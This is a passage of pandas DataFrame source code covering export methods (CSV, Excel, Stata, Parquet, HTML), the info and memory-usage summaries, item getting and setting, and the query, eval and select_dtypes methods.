tupleize_cols : boolean, default False
write multi_index columns as a list of tuples (if True)
or new (expanded format) if False)
infer_datetime_format: boolean, default False
If True and `parse_dates` is True for a column, try to infer the
datetime format based on the first datetime string. If the format
can be inferred, there often will be a large parsing speed-up.
See also
--------
pandas.read_csv
Returns
-------
y : DataFrame
"""
warnings.warn("from_csv is deprecated. Please use read_csv(...) "
"instead. Note that some of the default arguments are "
"different, so please refer to the documentation "
"for from_csv when changing your function calls",
FutureWarning, stacklevel=2)
from pandas.io.parsers import read_table
return read_table(path, header=header, sep=sep,
parse_dates=parse_dates, index_col=index_col,
encoding=encoding, tupleize_cols=tupleize_cols,
infer_datetime_format=infer_datetime_format)
def to_sparse(self, fill_value=None, kind='block'):
"""
Convert to SparseDataFrame
Parameters
----------
fill_value : float, default NaN
kind : {'block', 'integer'}
Returns
-------
y : SparseDataFrame
"""
from pandas.core.sparse.frame import SparseDataFrame
return SparseDataFrame(self._series, index=self.index,
columns=self.columns, default_kind=kind,
default_fill_value=fill_value)
def to_panel(self):
"""
Transform long (stacked) format (DataFrame) into wide (3D, Panel)
format.
.. deprecated:: 0.20.0
Currently the index of the DataFrame must be a 2-level MultiIndex. This
may be generalized later
Returns
-------
panel : Panel
"""
# only support this kind for now
if (not isinstance(self.index, MultiIndex) or # pragma: no cover
len(self.index.levels) != 2):
raise NotImplementedError('Only 2-level MultiIndex are supported.')
if not self.index.is_unique:
raise ValueError("Can't convert non-uniquely indexed "
"DataFrame to Panel")
self._consolidate_inplace()
# minor axis must be sorted
if self.index.lexsort_depth < 2:
selfsorted = self.sort_index(level=0)
else:
selfsorted = self
major_axis, minor_axis = selfsorted.index.levels
major_labels, minor_labels = selfsorted.index.labels
shape = len(major_axis), len(minor_axis)
# preserve names, if any
major_axis = major_axis.copy()
major_axis.name = self.index.names[0]
minor_axis = minor_axis.copy()
minor_axis.name = self.index.names[1]
# create new axes
new_axes = [selfsorted.columns, major_axis, minor_axis]
# create new manager
new_mgr = selfsorted._data.reshape_nd(axes=new_axes,
labels=[major_labels,
minor_labels],
shape=shape,
ref_items=selfsorted.columns)
return self._constructor_expanddim(new_mgr)
def to_csv(self, path_or_buf=None, sep=",", na_rep='', float_format=None,
columns=None, header=True, index=True, index_label=None,
mode='w', encoding=None, compression=None, quoting=None,
quotechar='"', line_terminator='\n', chunksize=None,
tupleize_cols=None, date_format=None, doublequote=True,
escapechar=None, decimal='.'):
r"""Write DataFrame to a comma-separated values (csv) file
Parameters
----------
path_or_buf : string or file handle, default None
File path or object, if None is provided the result is returned as
a string.
sep : character, default ','
Field delimiter for the output file.
na_rep : string, default ''
Missing data representation
float_format : string, default None
Format string for floating point numbers
columns : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, or False, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex. If
False do not print fields for index names. Use index_label=False
for easier importing in R
mode : str
Python write mode, default 'w'
encoding : string, optional
A string representing the encoding to use in the output file,
defaults to 'ascii' on Python 2 and 'utf-8' on Python 3.
compression : string, optional
a string representing the compression to use in the output file,
allowed values are 'gzip', 'bz2', 'xz',
only used when the first argument is a filename
line_terminator : string, default ``'\n'``
The newline character or character sequence to use in the output
file
quoting : optional constant from csv module
defaults to csv.QUOTE_MINIMAL. If you have set a `float_format`
then floats are converted to strings and thus csv.QUOTE_NONNUMERIC
will treat them as non-numeric
quotechar : string (length 1), default '\"'
character used to quote fields
doublequote : boolean, default True
Control quoting of `quotechar` inside a field
escapechar : string (length 1), default None
character used to escape `sep` and `quotechar` when appropriate
chunksize : int or None
rows to write at a time
tupleize_cols : boolean, default False
.. deprecated:: 0.21.0
This argument will be removed and will always write each row
of the multi-index as a separate row in the CSV file.
Write MultiIndex columns as a list of tuples (if True) or in
the new, expanded format, where each MultiIndex column is a row
in the CSV (if False).
date_format : string, default None
Format string for datetime objects
decimal: string, default '.'
Character recognized as decimal separator. E.g. use ',' for
European data
"""
if tupleize_cols is not None:
warnings.warn("The 'tupleize_cols' parameter is deprecated and "
"will be removed in a future version",
FutureWarning, stacklevel=2)
else:
tupleize_cols = False
formatter = fmt.CSVFormatter(self, path_or_buf,
line_terminator=line_terminator, sep=sep,
encoding=encoding,
compression=compression, quoting=quoting,
na_rep=na_rep, float_format=float_format,
cols=columns, header=header, index=index,
index_label=index_label, mode=mode,
chunksize=chunksize, quotechar=quotechar,
tupleize_cols=tupleize_cols,
date_format=date_format,
doublequote=doublequote,
escapechar=escapechar, decimal=decimal)
formatter.save()
if path_or_buf is None:
return formatter.path_or_buf.getvalue()
@Appender(_shared_docs['to_excel'] % _shared_doc_kwargs)
def to_excel(self, excel_writer, sheet_name='Sheet1', na_rep='',
float_format=None, columns=None, header=True, index=True,
index_label=None, startrow=0, startcol=0, engine=None,
merge_cells=True, encoding=None, inf_rep='inf', verbose=True,
freeze_panes=None):
from pandas.io.formats.excel import ExcelFormatter
formatter = ExcelFormatter(self, na_rep=na_rep, cols=columns,
header=header,
float_format=float_format, index=index,
index_label=index_label,
merge_cells=merge_cells,
inf_rep=inf_rep)
formatter.write(excel_writer, sheet_name=sheet_name, startrow=startrow,
startcol=startcol, freeze_panes=freeze_panes,
engine=engine)
def to_stata(self, fname, convert_dates=None, write_index=True,
encoding="latin-1", byteorder=None, time_stamp=None,
data_label=None, variable_labels=None):
"""
A class for writing Stata binary dta files from array-like objects
Parameters
----------
fname : str or buffer
String path of file-like object
convert_dates : dict
Dictionary mapping columns containing datetime types to stata
internal format to use when writing the dates. Options are 'tc',
'td', 'tm', 'tw', 'th', 'tq', 'ty'. Column can be either an integer
or a name. Datetime columns that do not have a conversion type
specified will be converted to 'tc'. Raises NotImplementedError if
a datetime column has timezone information
write_index : bool
Write the index to Stata dataset.
encoding : str
Default is latin-1. Unicode is not supported
byteorder : str
Can be ">", "<", "little", or "big". default is `sys.byteorder`
time_stamp : datetime
A datetime to use as file creation date. Default is the current
time.
dataset_label : str
A label for the data set. Must be 80 characters or smaller.
variable_labels : dict
Dictionary containing columns as keys and variable labels as
values. Each label must be 80 characters or smaller.
.. versionadded:: 0.19.0
Raises
------
NotImplementedError
* If datetimes contain timezone information
* Column dtype is not representable in Stata
ValueError
* Columns listed in convert_dates are neither datetime64[ns]
or datetime.datetime
* Column listed in convert_dates is not in DataFrame
* Categorical label contains more than 32,000 characters
.. versionadded:: 0.19.0
Examples
--------
>>> writer = StataWriter('./data_file.dta', data)
>>> writer.write_file()
Or with dates
>>> writer = StataWriter('./date_data_file.dta', data, {2 : 'tw'})
>>> writer.write_file()
"""
from pandas.io.stata import StataWriter
writer = StataWriter(fname, self, convert_dates=convert_dates,
encoding=encoding, byteorder=byteorder,
time_stamp=time_stamp, data_label=data_label,
write_index=write_index,
variable_labels=variable_labels)
writer.write_file()
def to_feather(self, fname):
"""
write out the binary feather-format for DataFrames
.. versionadded:: 0.20.0
Parameters
----------
fname : str
string file path
"""
from pandas.io.feather_format import to_feather
to_feather(self, fname)
def to_parquet(self, fname, engine='auto', compression='snappy',
**kwargs):
"""
Write a DataFrame to the binary parquet format.
.. versionadded:: 0.21.0
Parameters
----------
fname : str
string file path
engine : {'auto', 'pyarrow', 'fastparquet'}, default 'auto'
Parquet reader library to use. If 'auto', then the option
'io.parquet.engine' is used. If 'auto', then the first
library to be installed is used.
compression : str, optional, default 'snappy'
compression method, includes {'gzip', 'snappy', 'brotli'}
kwargs
Additional keyword arguments passed to the engine
"""
from pandas.io.parquet import to_parquet
to_parquet(self, fname, engine,
compression=compression, **kwargs)
@Substitution(header='Write out the column names. If a list of strings '
'is given, it is assumed to be aliases for the '
'column names')
@Appender(fmt.docstring_to_string, indents=1)
def to_string(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, justify=None,
line_width=None, max_rows=None, max_cols=None,
show_dimensions=False):
"""
Render a DataFrame to a console-friendly tabular output.
"""
formatter = fmt.DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify, justify=justify,
index_names=index_names,
header=header, index=index,
line_width=line_width,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions)
formatter.to_string()
if buf is None:
result = formatter.buf.getvalue()
return result
@Substitution(header='whether to print column labels, default True')
@Appender(fmt.docstring_to_string, indents=1)
def to_html(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, justify=None, bold_rows=True,
classes=None, escape=True, max_rows=None, max_cols=None,
show_dimensions=False, notebook=False, decimal='.',
border=None):
"""
Render a DataFrame as an HTML table.
`to_html`-specific options:
bold_rows : boolean, default True
Make the row labels bold in the output
classes : str or list or tuple, default None
CSS class(es) to apply to the resulting html table
escape : boolean, default True
Convert the characters <, >, and & to HTML-safe sequences.
max_rows : int, optional
Maximum number of rows to show before truncating. If None, show
all.
max_cols : int, optional
Maximum number of columns to show before truncating. If None, show
all.
decimal : string, default '.'
Character recognized as decimal separator, e.g. ',' in Europe
.. versionadded:: 0.18.0
border : int
A ``border=border`` attribute is included in the opening
`<table>` tag. Default ``pd.options.html.border``.
.. versionadded:: 0.19.0
"""
if (justify is not None and
justify not in fmt._VALID_JUSTIFY_PARAMETERS):
raise ValueError("Invalid value for justify parameter")
formatter = fmt.DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify, justify=justify,
index_names=index_names,
header=header, index=index,
bold_rows=bold_rows, escape=escape,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=decimal)
# TODO: a generic formatter wld b in DataFrameFormatter
formatter.to_html(classes=classes, notebook=notebook, border=border)
if buf is None:
return formatter.buf.getvalue()
def info(self, verbose=None, buf=None, max_cols=None, memory_usage=None,
null_counts=None):
"""
Concise summary of a DataFrame.
Parameters
----------
verbose : {None, True, False}, optional
Whether to print the full summary.
None follows the `display.max_info_columns` setting.
True or False overrides the `display.max_info_columns` setting.
buf : writable buffer, defaults to sys.stdout
max_cols : int, default None
Determines whether full summary or short summary is printed.
None follows the `display.max_info_columns` setting.
memory_usage : boolean/string, default None
Specifies whether total memory usage of the DataFrame
elements (including index) should be displayed. None follows
the `display.memory_usage` setting. True or False overrides
the `display.memory_usage` setting. A value of 'deep' is equivalent
of True, with deep introspection. Memory usage is shown in
human-readable units (base-2 representation).
null_counts : boolean, default None
Whether to show the non-null counts
- If None, then only show if the frame is smaller than
max_info_rows and max_info_columns.
- If True, always show counts.
- If False, never show counts.
"""
from pandas.io.formats.format import _put_lines
if buf is None: # pragma: no cover
buf = sys.stdout
lines = []
lines.append(str(type(self)))
lines.append(self.index.summary())
if len(self.columns) == 0:
lines.append('Empty %s' % type(self).__name__)
_put_lines(buf, lines)
return
cols = self.columns
# hack
if max_cols is None:
max_cols = get_option('display.max_info_columns',
len(self.columns) + 1)
max_rows = get_option('display.max_info_rows', len(self) + 1)
if null_counts is None:
show_counts = ((len(self.columns) <= max_cols) and
(len(self) < max_rows))
else:
show_counts = null_counts
exceeds_info_cols = len(self.columns) > max_cols
def _verbose_repr():
lines.append('Data columns (total %d columns):' %
len(self.columns))
space = max(len(pprint_thing(k)) for k in self.columns) + 4
counts = None
tmpl = "%s%s"
if show_counts:
counts = self.count()
if len(cols) != len(counts): # pragma: no cover
raise AssertionError('Columns must equal counts (%d != %d)'
% (len(cols), len(counts)))
tmpl = "%s non-null %s"
dtypes = self.dtypes
for i, col in enumerate(self.columns):
dtype = dtypes.iloc[i]
col = pprint_thing(col)
count = ""
if show_counts:
count = counts.iloc[i]
lines.append(_put_str(col, space) + tmpl % (count, dtype))
def _non_verbose_repr():
lines.append(self.columns.summary(name='Columns'))
def _sizeof_fmt(num, size_qualifier):
# returns size in human readable format
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return "%3.1f%s %s" % (num, size_qualifier, x)
num /= 1024.0
return "%3.1f%s %s" % (num, size_qualifier, 'PB')
if verbose:
_verbose_repr()
elif verbose is False: # specifically set to False, not nesc None
_non_verbose_repr()
else:
if exceeds_info_cols:
_non_verbose_repr()
else:
_verbose_repr()
counts = self.get_dtype_counts()
dtypes = ['%s(%d)' % k for k in sorted(compat.iteritems(counts))]
lines.append('dtypes: %s' % ', '.join(dtypes))
if memory_usage is None:
memory_usage = get_option('display.memory_usage')
if memory_usage:
# append memory usage of df to display
size_qualifier = ''
if memory_usage == 'deep':
deep = True
else:
# size_qualifier is just a best effort; not guaranteed to catch
# all cases (e.g., it misses categorical data even with object
# categories)
deep = False
if ('object' in counts or
self.index._is_memory_usage_qualified()):
size_qualifier = '+'
mem_usage = self.memory_usage(index=True, deep=deep).sum()
lines.append("memory usage: %s\n" %
_sizeof_fmt(mem_usage, size_qualifier))
_put_lines(buf, lines)
def memory_usage(self, index=True, deep=False):
"""Memory usage of DataFrame columns.
Parameters
----------
index : bool
Specifies whether to include memory usage of DataFrame's
index in returned Series. If `index=True` (default is False)
the first index of the Series is `Index`.
deep : bool
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption
Returns
-------
sizes : Series
A series with column names as index and memory usage of
columns with units of bytes.
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False
See Also
--------
numpy.ndarray.nbytes
"""
result = Series([c.memory_usage(index=False, deep=deep)
for col, c in self.iteritems()], index=self.columns)
if index:
result = Series(self.index.memory_usage(deep=deep),
index=['Index']).append(result)
return result
def transpose(self, *args, **kwargs):
"""Transpose index and columns"""
nv.validate_transpose(args, dict())
return super(DataFrame, self).transpose(1, 0, **kwargs)
T = property(transpose)
# ----------------------------------------------------------------------
# Picklability
# legacy pickle formats
def _unpickle_frame_compat(self, state): # pragma: no cover
from pandas.core.common import _unpickle_array
if len(state) == 2: # pragma: no cover
series, idx = state
columns = sorted(series)
else:
series, cols, idx = state
columns = _unpickle_array(cols)
index = _unpickle_array(idx)
self._data = self._init_dict(series, index, columns, None)
def _unpickle_matrix_compat(self, state): # pragma: no cover
from pandas.core.common import _unpickle_array
# old unpickling
(vals, idx, cols), object_state = state
index = _unpickle_array(idx)
dm = DataFrame(vals, index=index, columns=_unpickle_array(cols),
copy=False)
if object_state is not None:
ovals, _, ocols = object_state
objects = DataFrame(ovals, index=index,
columns=_unpickle_array(ocols), copy=False)
dm = dm.join(objects)
self._data = dm._data
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, index, col, takeable=False):
"""
Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
def _get_value(self, index, col, takeable=False):
if takeable:
series = self._iget_item_cache(col)
return _maybe_box_datetimelike(series._values[index])
series = self._get_item_cache(col)
engine = self.index._engine
try:
return engine.get_value(series._values, index)
except (TypeError, ValueError):
# we cannot handle direct indexing
# use positional
col = self.columns.get_loc(col)
index = self.index.get_loc(index)
return self._get_value(index, col, takeable=True)
_get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""
Put single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Returns
-------
frame : DataFrame
If label pair is contained, will be reference to calling DataFrame,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
def _set_value(self, index, col, value, takeable=False):
try:
if takeable is True:
series = self._iget_item_cache(col)
return series._set_value(index, value, takeable=True)
series = self._get_item_cache(col)
engine = self.index._engine
engine.set_value(series._values, index, value)
return self
except (KeyError, TypeError):
# set using a non-recursive method & reset the cache
self.loc[index, col] = value
self._item_cache.pop(col, None)
return self
_set_value.__doc__ = set_value.__doc__
def _ixs(self, i, axis=0):
"""
i : int, slice, or sequence of integers
axis : int
"""
# irow
if axis == 0:
"""
Notes
-----
If slice passed, the resulting data will be a view
"""
if isinstance(i, slice):
return self[i]
else:
label = self.index[i]
if isinstance(label, Index):
# a location index by definition
result = self.take(i, axis=axis)
copy = True
else:
new_values = self._data.fast_xs(i)
if is_scalar(new_values):
return new_values
# if we are a copy, mark as such
copy = (isinstance(new_values, np.ndarray) and
new_values.base is None)
result = self._constructor_sliced(new_values,
index=self.columns,
name=self.index[i],
dtype=new_values.dtype)
result._set_is_copy(self, copy=copy)
return result
# icol
else:
"""
Notes
-----
If slice passed, the resulting data will be a view
"""
label = self.columns[i]
if isinstance(i, slice):
# need to return view
lab_slice = slice(label[0], label[-1])
return self.loc[:, lab_slice]
else:
if isinstance(label, Index):
return self._take(i, axis=1, convert=True)
index_len = len(self.index)
# if the values returned are not the same length
# as the index (iow a not found value), iget returns
# a 0-len ndarray. This is effectively catching
# a numpy error (as numpy should really raise)
values = self._data.iget(i)
if index_len and not len(values):
values = np.array([np.nan] * index_len, dtype=object)
result = self._constructor_sliced._from_array(
values, index=self.index, name=label, fastpath=True)
# this is a cached value, mark it so
result._set_as_cached(label, self)
return result
def __getitem__(self, key):
key = com._apply_if_callable(key, self)
# shortcut if we are an actual column
is_mi_columns = isinstance(self.columns, MultiIndex)
try:
if key in self.columns and not is_mi_columns:
return self._getitem_column(key)
except:
pass
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._getitem_slice(indexer)
if isinstance(key, (Series, np.ndarray, Index, list)):
# either boolean or fancy integer index
return self._getitem_array(key)
elif isinstance(key, DataFrame):
return self._getitem_frame(key)
elif is_mi_columns:
return self._getitem_multilevel(key)
else:
return self._getitem_column(key)
def _getitem_column(self, key):
""" return the actual column """
# get column
if self.columns.is_unique:
return self._get_item_cache(key)
# duplicate columns & possible reduce dimensionality
result = self._constructor(self._data.get(key))
if result.columns.is_unique:
result = result[key]
return result
def _getitem_slice(self, key):
return self._slice(key, axis=0)
def _getitem_array(self, key):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
# warning here just in case -- previously __setitem__ was
# reindexing but __getitem__ was not; it seems more reasonable to
# go with the __setitem__ behavior since that is more consistent
# with all other indexing behavior
if isinstance(key, Series) and not key.index.equals(self.index):
warnings.warn("Boolean Series key will be reindexed to match "
"DataFrame index.", UserWarning, stacklevel=3)
elif len(key) != len(self.index):
raise ValueError('Item wrong length %d instead of %d.' %
(len(key), len(self.index)))
# check_bool_indexer will throw exception if Series key cannot
# be reindexed to match DataFrame rows
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
return self._take(indexer, axis=0, convert=False)
else:
indexer = self.loc._convert_to_indexer(key, axis=1)
return self._take(indexer, axis=1, convert=True)
def _getitem_multilevel(self, key):
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
new_columns = self.columns[loc]
result_columns = maybe_droplevels(new_columns, key)
if self._is_mixed_type:
result = self.reindex(columns=new_columns)
result.columns = result_columns
else:
new_values = self.values[:, loc]
result = self._constructor(new_values, index=self.index,
columns=result_columns)
result = result.__finalize__(self)
# If there is only one column being returned, and its name is
# either an empty string, or a tuple with an empty string as its
# first element, then treat the empty string as a placeholder
# and return the column as if the user had provided that empty
# string in the key. If the result is a Series, exclude the
# implied empty string from its name.
if len(result.columns) == 1:
top = result.columns[0]
if isinstance(top, tuple):
top = top[0]
if top == '':
result = result['']
if isinstance(result, Series):
result = self._constructor_sliced(result,
index=self.index,
name=key)
result._set_is_copy(self)
return result
else:
return self._get_item_cache(key)
def _getitem_frame(self, key):
if key.values.size and not is_bool_dtype(key.values):
raise ValueError('Must pass DataFrame with boolean values only')
return self.where(key)
def query(self, expr, inplace=False, **kwargs):
"""Query the columns of a frame with a boolean expression.
Parameters
----------
expr : string
The query string to evaluate. You can refer to variables
in the environment by prefixing them with an '@' character like
``@a + b``.
inplace : bool
Whether the query should modify the data in place or return
a modified copy
.. versionadded:: 0.18.0
kwargs : dict
See the documentation for :func:`pandas.eval` for complete details
on the keyword arguments accepted by :meth:`DataFrame.query`.
Returns
-------
q : DataFrame
Notes
-----
The result of the evaluation of this expression is first passed to
:attr:`DataFrame.loc` and if that fails because of a
multidimensional key (e.g., a DataFrame) then the result will be passed
to :meth:`DataFrame.__getitem__`.
This method uses the top-level :func:`pandas.eval` function to
evaluate the passed query.
The :meth:`~pandas.DataFrame.query` method uses a slightly
modified Python syntax by default. For example, the ``&`` and ``|``
(bitwise) operators have the precedence of their boolean cousins,
:keyword:`and` and :keyword:`or`. This *is* syntactically valid Python,
however the semantics are different.
You can change the semantics of the expression by passing the keyword
argument ``parser='python'``. This enforces the same semantics as
evaluation in Python space. Likewise, you can pass ``engine='python'``
to evaluate an expression using Python itself as a backend. This is not
recommended as it is inefficient compared to using ``numexpr`` as the
engine.
The :attr:`DataFrame.index` and
:attr:`DataFrame.columns` attributes of the
:class:`~pandas.DataFrame` instance are placed in the query namespace
by default, which allows you to treat both the index and columns of the
frame as a column in the frame.
The identifier ``index`` is used for the frame index; you can also
use the name of the index to identify it in a query. Please note that
Python keywords may not be used as identifiers.
For further details and examples see the ``query`` documentation in
:ref:`indexing <indexing.query>`.
See Also
--------
pandas.eval
DataFrame.eval
Examples
--------
>>> from numpy.random import randn
>>> from pandas import DataFrame
>>> df = pd.DataFrame(randn(10, 2), columns=list('ab'))
>>> df.query('a > b')
>>> df[df.a > df.b] # same result as the previous expression
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if not isinstance(expr, compat.string_types):
msg = "expr must be a string to be evaluated, {0} given"
raise ValueError(msg.format(type(expr)))
kwargs['level'] = kwargs.pop('level', 0) + 1
kwargs['target'] = None
res = self.eval(expr, **kwargs)
try:
new_data = self.loc[res]
except ValueError:
# when res is multi-dimensional loc raises, but this is sometimes a
# valid query
new_data = self[res]
if inplace:
self._update_inplace(new_data)
else:
return new_data
def eval(self, expr, inplace=False, **kwargs):
"""Evaluate an expression in the context of the calling DataFrame
instance.
Parameters
----------
expr : string
The expression string to evaluate.
inplace : bool, default False
If the expression contains an assignment, whether to perform the
operation inplace and mutate the existing DataFrame. Otherwise,
a new DataFrame is returned.
.. versionadded:: 0.18.0
kwargs : dict
See the documentation for :func:`~pandas.eval` for complete details
on the keyword arguments accepted by
:meth:`~pandas.DataFrame.query`.
Returns
-------
ret : ndarray, scalar, or pandas object
See Also
--------
pandas.DataFrame.query
pandas.DataFrame.assign
pandas.eval
Notes
-----
For more details see the API documentation for :func:`~pandas.eval`.
For detailed examples see :ref:`enhancing performance with eval
<enhancingperf.eval>`.
Examples
--------
>>> from numpy.random import randn
>>> from pandas import DataFrame
>>> df = pd.DataFrame(randn(10, 2), columns=list('ab'))
>>> df.eval('a + b')
>>> df.eval('c = a + b')
"""
from pandas.core.computation.eval import eval as _eval
inplace = validate_bool_kwarg(inplace, 'inplace')
resolvers = kwargs.pop('resolvers', None)
kwargs['level'] = kwargs.pop('level', 0) + 1
if resolvers is None:
index_resolvers = self._get_index_resolvers()
resolvers = dict(self.iteritems()), index_resolvers
if 'target' not in kwargs:
kwargs['target'] = self
kwargs['resolvers'] = kwargs.get('resolvers', ()) + tuple(resolvers)
return _eval(expr, inplace=inplace, **kwargs)
def select_dtypes(self, include=None, exclude=None):
"""Return a subset of a DataFrame including/excluding columns based on
their ``dtype``.
Parameters
----------
include, exclude : scalar or list-like
A selection of dtypes or strings to be included/excluded. At least
one of these parameters must be supplied.
Raises
------
ValueError
* If both of ``include`` and ``exclude`` are empty
* If ``include`` and ``exclude`` have overlapping elements
* If any kind of string dtype is passed in.
Returns
-------
subset : DataFrame
The subset of the frame including the dtypes in ``include`` and
excluding the dtypes in ``exclude``.
Notes
-----
* To select all *numeric* types use the numpy dtype ``numpy.number``
* To select strings you must use the ``object`` dtype, but note that
this will return *all* object dtype columns
* See the `numpy dtype hierarchy
<http://docs.scipy.org/doc/numpy/reference/arrays.scalars.html>`__
* To select datetimes, use np.datetime64, 'datetime' or 'datetime64'
* To select timedeltas, use np.timedelta64, 'timedelta' or
'timedelta64'
* To select Pandas categorical dtypes, use 'category'
* To select Pandas datetimetz dtypes, use 'datetimetz' (new in 0.20.0),
or a 'datetime64[ns, tz]' string
Examples
--------
>>> df = pd.DataFrame({'a': np.random.randn(6).astype('f4'),
... 'b': [True, False] * 3,
... 'c': [1.0, 2.0] * 3})
>>> df
a b c
0 0.3962 True 1
1 0.1459 False 2
2 0.2623 True 1
3 0.0764 False 2
4 -0.9703 True 1
5 -1.2094 False 2
>>> df.select_dtypes(include='bool')
c
0 True
1 False
2 True
3 False
4 True
5 False
>>> df.select_dtypes(include=['float64'])
c
0 1
1 2
2 1
3 2
4 1
5 2
>>> df.select_dtypes(exclude=['floating'])
b
0 True
1 False
2 True
3 False
4 True
5 False
"""
if not is_list_like(include):
include = (include,) if include is not None else ()
if not is_list_like(exclude):
exclude = (exclude,) if exclude is not None else ()
selection = tuple(map(frozenset, (include, exclude)))
if not any(selection):
raise ValueError('at least one of include or exclude must be '
'nonempty')
# convert the myriad valid dtypes object to a single representation
include, exclude = map(
lambda x: frozenset(map(_get_dtype_from_object, x)), selection)
for dtypes in (include, exclude):
invalidate_string_dtypes(dtypes)
# can't both include AND exclude!
if not include.isdisjoint(exclude):
raise ValueError('include and exclude overlap on %s' %
(include & exclude))
# empty include/exclude -> defaults to True
# three cases (we've already raised if both are empty)
# case 1: empty include, nonempty exclude
# we have True, True, ... True for include, same for exclude
# in the loop below we get the excluded
# and when we call '&' below we get only the excluded
# case 2: nonempty include, empty exclude
# same as case 1, but with include
# case 3: both nonempty
# the "union" of the logic of case 1 and case 2:
# we get the included and excluded, and return their logical and
include_these = Series(not bool(include), index=self.columns)
exclude_these = Series(not bool(exclude), index=self.columns)
def is_dtype_instance_mapper(column, dtype):
return column, functools.partial(issubclass, dtype.type)
for column, f in itertools.starmap(is_dtype_instance_mapper,
self.dtypes.iteritems()):
if include: # checks for the case of empty include or exclude
include_these[column] = any(map(f, include))
if exclude:
exclude_these[column] = not any(map(f, exclude))
dtype_indexer = include_these & exclude_these
return self.loc[com._get_info_slice(self, dtype_indexer)]
def _box_item_values(self, key, values):
items = self.columns[self.columns.get_loc(key)]
if values.ndim == 2:
return self._constructor(values.T, columns=items, index=self.index)
else:
return self._box_col_values(values, items)
def _box_col_values(self, values, items):
""" provide boxed values for a column """
return self._constructor_sliced._from_array(values, index=self.index,
name=items, fastpath=True)
def __setitem__(self, key, value):
key = com._apply_if_callable(key, self)
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._setitem_slice(indexer, value)
if isinstance(key, DataFrame) or getattr(key, 'ndim', None) == 2:
self._setitem_frame(key, value)
elif isinstance(key, (Series, np.ndarray, list, Index)):
self._setitem_array(key, value)
else:
# set column
self._set_item(key, value)
def _setitem_slice(self, key, value):
self._check_setitem_copy()
self.loc._setitem_with_indexer(key, value)
def _setitem_array(self, key, value):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
if len(key) != len(self.index):
raise ValueError('Item wrong length %d instead of %d!' %
(len(key), len(self.index)))
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
self._check_setitem_copy()
self.loc._setitem_with_indexer(indexer, value)
else:
if isinstance(value, DataFrame):
if len(value.columns) != len(key):
raise ValueError('Columns must be same length as key')
for k1, k2 in zip(key, value.columns):
self[k1] = value[k2]
else:
indexer = self.loc._convert_to_indexer(key, axis=1)
self._check_setitem_copy()
self.loc._setitem_with_indexer((slice(None), indexer), value)
def _setitem_frame(self, key, value):
# support boolean setting with DataFrame input, e.g.
# df[df > df2] = 0
if isinstance(key, np.ndarray):
if key.shape != self.shape:
raise ValueError(
'Array conditional must be same shape as self'
)
key = self._constructor(key, **self._construct_axes_dict())
if key.values.size and not is_bool_dtype(key.values):
raise TypeError(
'Must pass DataFrame or 2-d ndarray with boolean values only'
)
self._check_inplace_setting(value)
self._check_setitem_copy()
self._where(-key, value, inplace=True)
def _ensure_valid_index(self, value):
"""
ensure that if we don't have an index, that we can create one from the
passed value
"""
# GH5632, make sure that we are a Series convertible
if not len(self.index) and is_list_like(value):
try:
value = Series(value)
except:
raise ValueError('Cannot set a frame with no defined index '
'and a value that cannot be converted to a '
'Series')
self._data = self._data.reindex_axis(value.index.copy(), axis=1,
fill_value=np.nan)
def _set_item(self, key, value):
"""
Add series to DataFrame in specified column.
If series is a numpy-array (not a Series/TimeSeries), it must be the
same length as the DataFrames index or an error will be thrown.
Series/TimeSeries will be conformed to the DataFrames index to
ensure homogeneity.
"""
self._ensure_valid_index(value)
value = self._sanitize_column(key, value)
NDFrame._set_item(self, key, value)
# check if we are modifying a copy
# try to set first as we want an invalid
# value exception to occur first
if len(self):
self._check_setitem_copy()
def insert(self, loc, column, value, allow_duplicates=False):
"""
Insert column into DataFrame at specified location.
Raises a ValueError if `column` is already contained in the DataFrame,
unless `allow_duplicates` is set to True.
Parameters
----------
loc : int
Insertion index. Must verify 0 <= loc <= len(columns)
column : string, number, or hashable object
label of the inserted column
value : int, Series, or array-like
allow_duplicates : bool, optional
"""
self._ensure_valid_index(value)
value = self._sanitize_column(column, value, broadcast=False)
self._data.insert(loc, column, value,
allow_duplicates=allow_duplicates)
def assign(self, **kwargs):
r"""
